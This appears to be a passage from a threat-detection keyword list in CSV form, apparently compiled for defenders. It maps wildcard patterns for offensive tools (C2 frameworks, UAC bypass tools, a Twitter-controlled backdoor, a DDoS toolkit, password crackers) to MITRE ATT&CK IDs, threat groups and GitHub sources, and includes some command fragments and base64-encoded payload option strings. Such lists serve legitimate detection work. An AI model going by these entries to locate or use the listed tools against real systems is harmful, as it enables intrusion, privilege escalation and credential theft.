-*twint -g=*km* -o * --csv*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*twint -u * --since *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*twittor.py*,offensive_tool_keyword,twittor,A fully featured backdoor that uses Twitter as a C&C server ,T1105 - T1102 - T1041,TA0003 - TA0002 - TA0007,N/A,N/A,C2,https://github.com/PaulSec/twittor,1,1,N/A,10,10,743,253,2020-09-30T13:47:31Z,2015-09-09T07:23:25Z -*twittor-master.zip*,offensive_tool_keyword,twittor,A fully featured backdoor that uses Twitter as a C&C server ,T1105 - T1102 - T1041,TA0003 - TA0002 - TA0007,N/A,N/A,C2,https://github.com/PaulSec/twittor,1,1,N/A,10,10,743,253,2020-09-30T13:47:31Z,2015-09-09T07:23:25Z -*TWV0YXNwbG9pdCBSUEMgTG9hZGVy*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*Tycx2ry/SweetPotato*,offensive_tool_keyword,cobaltstrike,Modified SweetPotato to work with CobaltStrike v4.0,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tycx2ry/SweetPotato_CS,1,1,N/A,10,10,236,49,2020-04-30T14:27:20Z,2020-04-16T08:01:31Z -*Tylous/SourcePoint*,offensive_tool_keyword,cobaltstrike,SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tylous/SourcePoint,1,1,N/A,10,10,792,122,2022-11-17T01:04:04Z,2021-08-06T20:55:26Z -*TypeError/domained*,offensive_tool_keyword,domained,A domain name enumeration tool,T1593 - T1594 - T1595 - T1567,TA0007 - TA0009 - TA0004,N/A,N/A,Information Gathering,https://github.com/TypeError/domained,1,1,N/A,N/A,8,719,164,2021-04-11T09:54:50Z,2017-08-18T00:03:39Z -*U2hlbGxjb2RlIFBhdGg=*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*U2VhdGJlbHQuZXhl*,offensive_tool_keyword,NetLoader,Loads any C# binary in memory - patching AMSI + ETW,T1055.012 - T1112 - T1562.001,TA0005 - TA0002,N/A,N/A,Exploitation tools - Defense Evasion,https://github.com/Flangvik/NetLoader,1,0,N/A,10,7,684,139,2021-10-03T16:41:03Z,2020-05-05T15:20:16Z -*U2VtaW5vbGVzd291bGRkZXN0cm95cGVubnN0YXRl*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*uac fodhelper *,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*uac sdclt *,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*uac_bypass*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*uac_easinvoker.*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,1,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*UACBypass -*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*UAC-bypass*,offensive_tool_keyword,Earth Lusca Operations Tools ,Earth Lusca Operations Tools and commands,T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090,TA0007 - TA0008,N/A,N/A,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1,1,0,N/A,N/A,,N/A,,, -*uacbypass_files*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,1,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*UACBypass-BOF*,offensive_tool_keyword,cobaltstrike,Beacon Object File implementation of Event Viewer deserialization UAC bypass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/TrustedPath-UACBypass-BOF,1,1,N/A,10,10,104,33,2021-08-16T07:49:55Z,2021-08-07T03:40:33Z -*UACBypassedService.exe*,offensive_tool_keyword,SCMUACBypass,SCM UAC Bypass,T1548.002 - T1088,TA0004 - TA0002,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/SCMUACBypass,1,1,N/A,8,1,57,9,2023-09-05T17:24:49Z,2023-09-04T13:11:17Z -*uacm4gic*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*UACME-master*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*uac-schtasks *,offensive_tool_keyword,cobaltstrike,The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/ElevateKit,1,0,N/A,10,10,812,205,2020-06-22T21:12:24Z,2016-12-08T03:51:09Z -*uac-schtasks*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*uac-silentcleanup*,offensive_tool_keyword,cobaltstrike,New UAC bypass for Silent Cleanup for CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EncodeGroup/UAC-SilentClean,1,1,N/A,10,10,173,32,2021-07-14T13:51:02Z,2020-10-07T13:25:21Z -*uac-token-duplication*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*UACTokenManipulationManager.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*uaf2john.*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*uberfile --lhost* --lport * --target-os * --downloader *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*UCCAPI/16.0.13328.20130 OC/16.0.13426.20234*,greyware_tool_keyword,lyncsmash,default user agent used by lyncsmash.py - a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ,T1190 - T1087 - T1110,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/nyxgeek/lyncsmash,1,1,greyware_tools high risks of false positives,N/A,4,323,68,2023-05-03T19:07:11Z,2016-05-20T04:32:41Z -*udmp-parser-main*,offensive_tool_keyword,udmp-parser,A Cross-Platform C++ parser library for Windows user minidumps.,T1005 - T1059.003 - T1027.002,TA0009 - TA0005 - TA0040,N/A,N/A,Credential Access,https://github.com/0vercl0k/udmp-parser,1,1,N/A,6,2,160,22,2023-08-27T18:30:24Z,2022-01-30T18:56:21Z -*UDVC-Server.exe -c * -i 127.0.0.1*,offensive_tool_keyword,UniversalDVC,run an executable (UDVC-Server.exe) that sets up a communication channel for redirecting an SSF port using a DVC server. This can be seen as a form of proxy to evade detection or bypass network restrictions.,T1090,TA0005,N/A,N/A,Defense Evasion,https://github.com/earthquake/UniversalDVC,1,0,N/A,N/A,3,242,54,2020-12-07T21:02:23Z,2018-03-09T10:44:29Z -*UFONet*,offensive_tool_keyword,UFONet,UFONet - is a free software. P2P and cryptographic -disruptive toolkit- that allows to perform DoS and DDoS attacks. on the Layer 7 (APP/HTTP) through the exploitation of Open Redirect vectors on third-party websites to act as a botnet and on the Layer3 (Network) abusing the protocol.,T1498 - T1499 - T1496 - T1497 - T1497,TA0040 - TA0041,N/A,N/A,DDOS,https://github.com/epsylon/ufonet,1,0,N/A,N/A,10,1920,587,2022-11-28T17:28:29Z,2013-06-18T18:11:25Z -*UFR5cGUgQW5kIFBPcHRpb25zIFRvbyBsb25nIQ==*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*UGF5bG9hZCBOYW1lLCBlLmcuIHdpbmRvd3MvbWV0ZXJwcmV0ZXIvcmV2ZXJzZV90Y3A=*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*UGF5bG9hZCBvcHRpb25zLCBlLmcuIExIT1NUPTEuMS4xLjEsTFBPUlQ9ODg2Ng==*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*uhttpsharp.*,offensive_tool_keyword,cobaltstrike,SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/SpiderLabs/SharpCompile,1,1,N/A,10,10,289,63,2020-08-07T12:49:36Z,2018-11-01T17:18:52Z -*uknowsec/TailorScan*,offensive_tool_keyword,cobaltstrike,Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/uknowsec/TailorScan,1,1,N/A,10,10,269,49,2020-11-12T08:29:11Z,2020-11-09T07:38:16Z -*UlBDIFNlcnZlciBIb3N0*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for 